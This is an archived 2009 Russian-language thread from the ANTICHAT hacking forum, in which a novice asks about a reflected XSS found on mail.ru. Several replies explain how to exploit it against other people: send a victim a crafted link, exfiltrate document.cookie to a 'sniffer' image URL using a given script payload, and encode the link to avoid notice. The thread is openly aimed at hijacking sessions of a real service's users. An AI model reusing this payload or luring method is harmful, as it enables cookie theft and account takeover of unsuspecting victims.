ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
пассивная xss на mail.ru, вопрос |
08.03.2009, 03:02
|
|
Новичок
Регистрация: 04.03.2009
Сообщений: 23
Провел на форуме:
59175
Репутация:
0
|
|
пассивная xss на mail.ru, вопрос
Я тут лазил по mail.ru искал XSS, вылитило следующее окно. На то, что было забито в скрипт как предупреждение это не похоже. Так, что это кто нить знает ?
 |
|
|
08.03.2009, 03:10
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
>>Так, что это кто нить знает ?
пасвная XSS
|
|
|
|
08.03.2009, 03:21
|
|
Новичок
Регистрация: 04.03.2009
Сообщений: 23
Провел на форуме:
59175
Репутация:
0
|
|
Скрипт следующий: "><script>alert(XSS)</script>, а выскочела такая бойда почему ?
|
|
|
|
08.03.2009, 03:27
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
ты чет напутал!
или скрипт нетот пихнул и незаметил...
То что на картинке - результат действия следуйщего скриптк:
Код:
"><script>alert(document.cookie)</script>
|
|
|
|
08.03.2009, 03:33
|
|
Новичок
Регистрация: 04.03.2009
Сообщений: 23
Провел на форуме:
59175
Репутация:
0
|
|
Блин, да ты прав я именно этим скриптом и пробовал.
А через эту уизвимость куки можно пробивать ?
|
|
|
|
08.03.2009, 03:36
|
|
Познающий
Регистрация: 04.11.2008
Сообщений: 31
Провел на форуме:
2284670
Репутация:
16
|
|
просиш жертву зделать также как и ты зделал с етим скриптом "><script>alert(document.cookie)</script>
|
|
|
|
08.03.2009, 03:36
|
|
Участник форума
Регистрация: 21.09.2008
Сообщений: 148
Провел на форуме:
678893
Репутация:
102
|
|
мочишь xD, искать xss и даже не знать что это и как заюзать, тебе сюда
ну раз спросил то отвечу - да, угнать кукисы можно |
|
|
|
08.03.2009, 03:38
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Сообщение от needle
просиш жертву зделать также как и ты зделал с етим скриптом "><script>alert(document.cookie)</script>
и что?
она посмотрит на свои куки=///////
ТС
кидаеш жертве линк с яваскриптом в котором будет (сниффер+document.cookie)
и жди куки)
например что то типа:
'><script>img = new Image();img.src="снифферкартинко"+d ocument.cookie;</script>
Последний раз редактировалось -m0rgan-; 08.03.2009 в 03:42..
|
|
|
|
08.03.2009, 03:38
|
|
Новичок
Регистрация: 04.03.2009
Сообщений: 23
Провел на форуме:
59175
Репутация:
0
|
|
Спасибо, я тока учусь ))
|
|
|
|
08.03.2009, 03:40
|
|
Участник форума
Регистрация: 24.11.2008
Сообщений: 205
Провел на форуме:
1123418
Репутация:
362
|
|
только закодировать не забудь
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [dei]](/avatars/avatar69047.jpg?1156503){kind=avatar}
Похожие темы
Линейный вид
